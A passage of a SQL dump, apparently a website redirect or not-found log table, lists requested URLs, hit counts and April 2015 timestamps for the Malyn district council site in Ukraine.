13:24:50','0000-00-00 00:00:00',301),(13143,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-04-17 13:50:12','0000-00-00 00:00:00',301),(13144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-04-17 13:50:15','0000-00-00 00:00:00',301),(13145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2015-04-17 13:50:17','0000-00-00 00:00:00',301),(13146,'http://malyn-rayrada.org.ua/templates/cacheplugin.php','','','',4,0,'2015-04-17 15:10:54','0000-00-00 00:00:00',301),(13147,'http://www.malyn-rayrada.org.ua/templates/cacheplugin.php','','','',4,0,'2015-04-17 15:10:58','0000-00-00 00:00:00',301),(13148,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33&Itemid=66&lang=en','','','',4,0,'2015-04-17 16:41:34','0000-00-00 00:00:00',301),(13149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33:-20052011&Itemid=66&lang=en','','','',5,0,'2015-04-17 17:03:10','0000-00-00 00:00:00',301),(13150,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33:-20052011&Itemid=66&lang=en','','','',2,0,'2015-04-17 17:08:05','0000-00-00 00:00:00',301),(13151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=276:---4-----6--25032011-&catid=31:-25032011&Itemid=62&lang=uk','','','',8,0,'2015-04-17 19:54:51','0000-00-00 00:00:00',301),(13152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-04-17 20:49:54','0000-00-00 00:00:00',301),(13153,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=851:-2013-&catid=46:--21122012&Itemid=85&lang=en','','','',5,0,'2015-04-17 20:53:48','0000-00-00 00:00:00',301),(13154,'http://www.malyn-rayrada.org.ua/index.php/836-komunalne-pidpriemstvo-arhplan-malinskoi-rajonnoi','','','',35,0,'2015-04-17 21:43:57','0000-00-00 00:00:00',301),(13155,'http://www.malyn-rayrada.org.ua/index.php/409-ocinka-rezultativ-dijalnosti-rajonnih-derzhavnih','','','',45,0,'2015-04-17 23:22:41','0000-00-00 00:00:00',301),(13156,'http://malyn-rayrada.org.ua/index.php/817-kolektiv-rajonnoi-radi-priednuetsja-do-vitan','','','',6,0,'2015-04-18 04:00:06','0000-00-00 00:00:00',301),(13157,'http://www.malyn-rayrada.org.ua/index.php/373-dani-pro-vikonannja-dohidnoi-chastini-za-9','','','',47,0,'2015-04-18 04:40:35','0000-00-00 00:00:00',301),(13158,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38&Itemid=73&lang=en','','','',4,0,'2015-04-18 05:10:38','0000-00-00 00:00:00',301),(13159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38&Itemid=73&lang=ru','','','',5,0,'2015-04-18 05:10:42','0000-00-00 00:00:00',301),(13160,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38:--19122011-&Itemid=73&lang=en','','','',5,0,'2015-04-18 05:10:45','0000-00-00 00:00:00',301),(13161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:-2012-&catid=38&Itemid=73&lang=en','','','',2,0,'2015-04-18 05:10:53','0000-00-00 00:00:00',301),(13162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38&Itemid=73&lang=en','','','',1,0,'2015-04-18 05:11:01','0000-00-00 00:00:00',301),(13163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=526:-2012-&catid=38&Itemid=73&lang=ru','','','',2,0,'2015-04-18 05:11:08','0000-00-00 00:00:00',301),(13164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=en','','','',1,0,'2015-04-18 05:11:13','0000-00-00 00:00:00',301),(13165,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=751:-15-6-&catid=11&lang=ru','','','',1,0,'2015-04-18 05:11:17','0000-00-00 00:00:00',301),(13166,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=en','','','',1,0,'2015-04-18 05:12:21','0000-00-00 00:00:00',301),(13167,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=ru','','','',1,0,'2015-04-18 05:12:30','0000-00-00 00:00:00',301),(13168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-04-18 05:12:35','0000-00-00 00:00:00',301),(13169,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=en','','','',3,0,'2015-04-18 05:12:38','0000-00-00 00:00:00',301),(13170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45:--14112012-&Itemid=84&lang=en','','','',4,0,'2015-04-18 05:15:03','0000-00-00 00:00:00',301),(13171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45:--14112012-&Itemid=84&lang=uk','','','',1,0,'2015-04-18 05:15:05','0000-00-00 00:00:00',301),(13172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=en','','','',1,0,'2015-04-18 05:17:41','0000-00-00 00:00:00',301),(13173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11&lang=ru','','','',4,0,'2015-04-18 05:17:45','0000-00-00 00:00:00',301),(13174,'http://www.malyn-rayrada.org.ua/index.php/726-nachalnik-ovruckogo-mrv-kvi-ivan-levchenko-alkogol','','','',92,0,'2015-04-18 07:33:49','0000-00-00 00:00:00',301),(13175,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37:--21102011-&Itemid=72&lang=en','','','',3,0,'2015-04-18 11:12:11','0000-00-00 00:00:00',301),(13176,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37:--21102011-&Itemid=72&lang=ru','','','',1,0,'2015-04-18 11:12:17','0000-00-00 00:00:00',301),(13177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38&Itemid=73&lang=en','','','',2,0,'2015-04-18 11:13:43','0000-00-00 00:00:00',301),(13178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38&Itemid=73&lang=ru','','','',3,0,'2015-04-18 11:13:48','0000-00-00 00:00:00',301),(13179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-04-18 11:13:54','0000-00-00 00:00:00',301),(13180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38&Itemid=73&lang=en','','','',3,0,'2015-04-18 11:16:25','0000-00-00 00:00:00',301),(13181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-04-18 11:16:28','0000-00-00 00:00:00',301),(13182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38:--19122011-&Itemid=73&lang=en','','','',4,0,'2015-04-18 11:16:35','0000-00-00 00:00:00',301),(13183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38:--19122011-&Itemid=73&lang=ru','','','',13,0,'2015-04-18 11:16:38','0000-00-00 00:00:00',301),(13184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2015-04-18 11:16:44','0000-00-00 00:00:00',301),(13185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43&Itemid=82&lang=ru','','','',39,0,'2015-04-18 13:29:41','0000-00-00 00:00:00',301),(13186,'http://malyn-rayrada.org.ua/index.php/836-komunalne-pidpriemstvo-arhplan-malinskoi-rajonnoi','','','',5,0,'2015-04-18 13:55:02','0000-00-00 00:00:00',301),(13187,'http://www.malyn-rayrada.org.ua/index.php/printButton_001.png','','http://www.malyn-rayrada.org.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pri','',1,0,'2015-04-18 14:15:13','0000-00-00 00:00:00',301),(13188,'http://www.malyn-rayrada.org.ua/index.php/word.gif','','http://www.malyn-rayrada.org.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pri','',1,0,'2015-04-18 14:15:13','0000-00-00 00:00:00',301),(13189,'http://www.malyn-rayrada.org.ua/index.php/t.gif','','http://www.malyn-rayrada.org.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pri','',1,0,'2015-04-18 14:15:13','0000-00-00 00:00:00',301),(13190,'http://www.malyn-rayrada.org.ua/index.php/informer_6.png','','http://www.malyn-rayrada.org.ua/index.php/899-zastupnik-keruyuchogo-malinskogo-viddilennya-oshchadbanku-svitlana-mikhajlenko-informue-pro-programu-pri','',1,0,'2015-04-18 14:15:14','0000-00-00 00:00:00',301),(13191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43:--25072012-&Itemid=82&lang=en','','','',16,0,'2015-04-18 15:29:59','0000-00-00 00:00:00',301),(13192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38&Itemid=73&lang=uk','','','',10,0,'2015-04-18 15:53:43','0000-00-00 00:00:00',301),(13193,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=521:--------------------2012-&catid=36&Itemid=70&lang=ru','','','',34,0,'2015-04-18 16:18:17','0000-00-00 00:00:00',301),(13194,'http://www.malyn-rayrada.org.ua/index.php/465-ogoloshennja_3','','','',63,0,'2015-04-18 18:43:41','0000-00-00 00:00:00',301),(13195,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=186:-6-&catid=20&Itemid=42&lang=ru','','','',3,0,'2015-04-18 19:04:14','0000-00-00 00:00:00',301),(13196,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-04-18 19:04:30','0000-00-00 00:00:00',301),(13197,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29:--15122010-&Itemid=60&lang=ru','','','',5,0,'2015-04-18 19:04:33','0000-00-00 00:00:00',301),(13198,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=200:-----------------2006-2010-&catid=29:--15122010-&Itemid=60&lang=uk','','','',6,0,'2015-04-18 19:04:36','0000-00-00 00:00:00',301),(13199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29&Itemid=60&lang=en','','','',4,0,'2015-04-18 19:13:48','0000-00-00 00:00:00',301),(13200,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=212:2010-12-15-14-49-15&catid=29&Itemid=60&lang=ru','','','',10,0,'2015-04-18 19:13:54','0000-00-00 00:00:00',301),(13201,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37:--21102011-&Itemid=72&lang=en','','','',1,0,'2015-04-18 19:15:58','0000-00-00 00:00:00',301),(13202,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37:--21102011-&Itemid=72&lang=ru','','','',2,0,'2015-04-18 19:16:01','0000-00-00 00:00:00',301),(13203,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37:--21102011-&Itemid=72&lang=uk','','','',3,0,'2015-04-18 19:16:04','0000-00-00 00:00:00',301),(13204,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37&Itemid=72&lang=en','','','',1,0,'2015-04-18 19:16:07','0000-00-00 00:00:00',301),(13205,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=438:-----------l--r&catid=37&Itemid=72&lang=uk','','','',3,0,'2015-04-18 19:16:12','0000-00-00 00:00:00',301),(13206,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38&Itemid=73&lang=en','','','',2,0,'2015-04-18 19:22:14','0000-00-00 00:00:00',301),(13207,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38&Itemid=73&lang=ru','','','',2,0,'2015-04-18 19:22:18','0000-00-00 00:00:00',301),(13208,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=en','','','',1,0,'2015-04-18 19:29:16','0000-00-00 00:00:00',301),(13209,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=ru','','','',3,0,'2015-04-18 19:29:18','0000-00-00 00:00:00',301),(13210,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11&lang=en','','','',1,0,'2015-04-18 19:29:29','0000-00-00 00:00:00',301),(13211,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45&Itemid=84&lang=en','','','',1,0,'2015-04-18 19:29:58','0000-00-00 00:00:00',301),(13212,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=en','','','',1,0,'2015-04-18 19:31:44','0000-00-00 00:00:00',301),(13213,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=ru','','','',5,0,'2015-04-18 19:31:48','0000-00-00 00:00:00',301),(13214,'http://www.malyn-rayrada.org.ua/index.php/838-upravlinnja-statistiki-u-m-malini-informue_3','','','',6,0,'2015-04-19 08:30:31','0000-00-00 00:00:00',301),(13215,'http://www.malyn-rayrada.org.ua/index.php/198-chi-budut-novovvedennja-v-roboti-pozhezhnih','','','',42,0,'2015-04-19 09:57:18','0000-00-00 00:00:00',301),(13216,'http://malyn-rayrada.org.ua/index.php/1072-zustrich-iz-predstavnikami-teritorialnikh-gromad-kerivnitstva-blagodijnoji-organizatsiji-chornobilska-likarnyana-kasa','','','',5,0,'2015-04-19 10:53:45','0000-00-00 00:00:00',301),(13217,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/42-informacija-dibrivskoi-silskoi-radi','','','',5,0,'2015-04-19 13:32:37','0000-00-00 00:00:00',301),(13218,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=526:-2012-&Itemid=73&lang=uk&option=com_content&view=article','','','',4,0,'2015-04-19 14:01:09','0000-00-00 00:00:00',301),(13219,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-04-19 14:21:36','0000-00-00 00:00:00',301),(13220,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38:--19122011-&Itemid=73&lang=en','','','',1,0,'2015-04-19 14:22:35','0000-00-00 00:00:00',301),(13221,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-04-19 14:22:38','0000-00-00 00:00:00',301),(13222,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=480:2011-11-28-10-11-58&catid=38:--19122011-&Itemid=73&lang=uk','','','',1,0,'2015-04-19 14:22:42','0000-00-00 00:00:00',301),(13223,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=765:-qq&catid=11&lang=uk','','','',6,0,'2015-04-19 14:25:06','0000-00-00 00:00:00',301),(13224,'http://www.malyn-rayrada.org.ua/index.php/520-vikonannja-dohidnoi-chastini-za-pershij-kvartal','','','',11,0,'2015-04-19 17:29:36','0000-00-00 00:00:00',301),(13225,'http://www.malyn-rayrada.org.ua/index.php/748-pro-priznachennja-ju-martinjuka-golovoju-malinskoi','','','',105,0,'2015-04-19 18:23:50','0000-00-00 00:00:00',301),(13226,'http://www.malyn-rayrada.org.ua/index.php/442-vitaemo-z-novim-2013-rokom-ta-rizdvom-hristovim','','','',44,0,'2015-04-19 23:08:08','0000-00-00 00:00:00',301),(13227,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/756-informacija-ivanivskoi-silskoi-radi','','','',22,0,'2015-04-19 23:14:02','0000-00-00 00:00:00',301),(13228,'http://www.malyn-rayrada.org.ua/index.php/553-do-vidoma-deputativ-rajonnoi-radi_2','','','',14,0,'2015-04-19 23:18:35','0000-00-00 00:00:00',301),(13229,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=528:2012-01-05-18-49-59&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2015-04-20 00:21:09','0000-00-00 00:00:00',301),(13230,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-04-20 01:38:22','0000-00-00 00:00:00',301),(13231,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29:--15122010-&Itemid=60&lang=ru','','','',1,0,'2015-04-20 01:38:25','0000-00-00 00:00:00',301),(13232,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29:--15122010-&Itemid=60&lang=uk','','','',1,0,'2015-04-20 01:38:29','0000-00-00 00:00:00',301),(13233,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-20 01:43:42','0000-00-00 00:00:00',301),(13234,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-20 01:43:45','0000-00-00 00:00:00',301),(13235,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=326:2011-05-20-16-17-28&catid=33&Itemid=66&lang=uk','','','',35,0,'2015-04-20 06:04:37','0000-00-00 00:00:00',301),(13236,'http://www.malyn-rayrada.org.ua/index.php/301-opriljudnennja-dohodiv-golovi-malinskoi-rajonnoi','','','',85,0,'2015-04-20 10:12:07','0000-00-00 00:00:00',301),(13237,'http://www.malyn-rayrada.org.ua/index.php/851-jak-otrimati-kompensaciju-na-oplatu-komunalnih','','','',42,0,'2015-04-20 13:08:15','0000-00-00 00:00:00',301),(13238,'http://www.malyn-rayrada.org.ua/index.php/882-pro-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-serpen-2014-roku?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-04-20 20:30:47','0000-00-00 00:00:00',301),(13239,'http://www.malyn-rayrada.org.ua/index.php/855-pro-dostrokove-pripinennja-povnovazhen-verhovnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-04-20 20:31:15','0000-00-00 00:00:00',301),(13240,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44:--12092012-&Itemid=83&lang=ru','','','',5,0,'2015-04-20 20:35:30','0000-00-00 00:00:00',301),(13241,'http://www.malyn-rayrada.org.ua/index.php/763-nachalnik-mrv-kvi-ivan-levchenko-informue?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-04-20 20:37:27','0000-00-00 00:00:00',301),(13242,'http://www.malyn-rayrada.org.ua/index.php/851-jak-otrimati-kompensaciju-na-oplatu-komunalnih?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-04-20 20:42:12','0000-00-00 00:00:00',301),(13243,'http://www.malyn-rayrada.org.ua/index.php/277-vikonannja-dohidnoi-chastini-bjudzhetiv-oblasti-za?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-04-20 20:47:56','0000-00-00 00:00:00',301),(13244,'http://malyn-rayrada.org.ua/media/cacheplugin.php','','','',3,0,'2015-04-21 01:51:32','0000-00-00 00:00:00',301),(13245,'http://www.malyn-rayrada.org.ua/media/cacheplugin.php','','','',3,0,'2015-04-21 01:51:34','0000-00-00 00:00:00',301),(13246,'http://www.malyn-rayrada.org.ua/index.php/714-verhovna-rada-obrala-novim-spikerom-oleksandra','','','',11,0,'2015-04-21 04:47:01','0000-00-00 00:00:00',301),(13247,'http://www.malyn-rayrada.org.ua/index.php/143-hto-otrimae-cifrovi-tv-tjuneri-bezkoshtovno','','','',38,0,'2015-04-21 07:43:05','0000-00-00 00:00:00',301),(13248,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=478:2011-11-25-09-31-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-04-21 08:35:41','0000-00-00 00:00:00',301),(13249,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=312:-2011-&catid=33&Itemid=66&lang=uk','','','',11,0,'2015-04-21 17:51:32','0000-00-00 00:00:00',301),(13250,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=313:-2011-2015-&catid=33:-20052011&Itemid=66&lang=ru','','','',30,0,'2015-04-21 19:02:39','0000-00-00 00:00:00',301),(13251,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-04-21 19:06:37','0000-00-00 00:00:00',301),(13252,'http://www.malyn-rayrada.org.ua/index.php/713-biatlon-zhinocha-estafeta-zoloto','','','',80,0,'2015-04-22 00:48:41','0000-00-00 00:00:00',301),(13253,'http://malyn-rayrada.org.ua/index.php/812-shhodo-oplati-elektroenergii','','','',4,0,'2015-04-22 04:36:53','0000-00-00 00:00:00',301),(13254,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=471:2011-11-21-08-33-43&catid=38:--19122011-&Itemid=73&lang=ru','','','',19,0,'2015-04-22 04:53:58','0000-00-00 00:00:00',301),(13255,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=713:2012-06-14-15-13-57&catid=43&Itemid=82&lang=ru','','','',38,0,'2015-04-22 10:24:41','0000-00-00 00:00:00',301),(13256,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=301:2011-05-11-13-29-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2015-04-22 11:08:48','0000-00-00 00:00:00',301),(13257,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/undefined','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/416-pro-vstanovlennja-mezh-silskih-naselenih-punktiv_2','',1,0,'2015-04-22 13:40:27','0000-00-00 00:00:00',301),(13258,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=528:2012-01-05-18-49-59&catid=11&Itemid=14&lang=uk','','','',9,0,'2015-04-22 18:28:01','0000-00-00 00:00:00',301),(13259,'http://www.malyn-rayrada.org.ua/index.php/294-deputati-zaboronili-kuriti-u-gromadskih-miscjah','','','',91,0,'2015-04-22 19:10:25','0000-00-00 00:00:00',301),(13260,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38:--19122011-&Itemid=73&lang=uk','','','',7,0,'2015-04-23 01:50:11','0000-00-00 00:00:00',301),(13261,'http://www.malyn-rayrada.org.ua/index.php/732-pro-sklikannja-29-sesii-rajonnoi-radi-6-sklikannja','','','',36,0,'2015-04-23 09:42:55','0000-00-00 00:00:00',301),(13262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11&lang=uk','','','',26,0,'2015-04-23 11:51:41','0000-00-00 00:00:00',301),(13263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43&Itemid=82&lang=en','','','',1,0,'2015-04-23 18:55:00','0000-00-00 00:00:00',301),(13264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43&Itemid=82&lang=ru','','','',3,0,'2015-04-23 18:55:03','0000-00-00 00:00:00',301),(13265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2015-04-23 18:55:08','0000-00-00 00:00:00',301),(13266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-04-23 18:55:11','0000-00-00 00:00:00',301),(13267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-04-23 18:55:13','0000-00-00 00:00:00',301),(13268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=709:2012-06-14-15-04-11&catid=43&Itemid=82&lang=en','','','',2,0,'2015-04-23 18:55:16','0000-00-00 00:00:00',301),(13269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=709:2012-06-14-15-04-11&catid=43&Itemid=82&lang=ru','','','',6,0,'2015-04-23 18:55:19','0000-00-00 00:00:00',301),(13270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=709:2012-06-14-15-04-11&catid=43:--25072012-&Itemid=82&lang=ru','','','',1,0,'2015-04-23 18:55:24','0000-00-00 00:00:00',301),(13271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=709:2012-06-14-15-04-11&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-04-23 18:55:26','0000-00-00 00:00:00',301),(13272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=713:2012-06-14-15-13-57&catid=43&Itemid=82&lang=en','','','',5,0,'2015-04-23 18:56:12','0000-00-00 00:00:00',301),(13273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43&Itemid=82&lang=en','','','',5,0,'2015-04-23 18:56:16','0000-00-00 00:00:00',301),(13274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=714:2012-06-14-15-15-43&catid=43:--25072012-&Itemid=82&lang=uk','','','',6,0,'2015-04-23 18:56:24','0000-00-00 00:00:00',301),(13275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=716:2012-06-14-15-19-24&catid=43:--25072012-&Itemid=82&lang=uk','','','',3,0,'2015-04-23 18:56:33','0000-00-00 00:00:00',301),(13276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43&Itemid=82&lang=en','','','',2,0,'2015-04-23 19:00:46','0000-00-00 00:00:00',301),(13277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&catid=43&Itemid=82&lang=ru','','','',3,0,'2015-04-23 19:00:48','0000-00-00 00:00:00',301),(13278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=en&Itemid=','','','',4,0,'2015-04-23 19:01:18','0000-00-00 00:00:00',301),(13279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=en&Itemid=0','','','',1,0,'2015-04-23 19:01:20','0000-00-00 00:00:00',301),(13280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=ru&Itemid=','','','',1,0,'2015-04-23 19:01:23','0000-00-00 00:00:00',301),(13281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=ru&Itemid=0','','','',2,0,'2015-04-23 19:01:26','0000-00-00 00:00:00',301),(13282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=uk&Itemid=','','','',4,0,'2015-04-23 19:01:28','0000-00-00 00:00:00',301),(13283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=uk&Itemid=0','','','',2,0,'2015-04-23 19:01:30','0000-00-00 00:00:00',301),(13284,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2015-04-23 19:01:33','0000-00-00 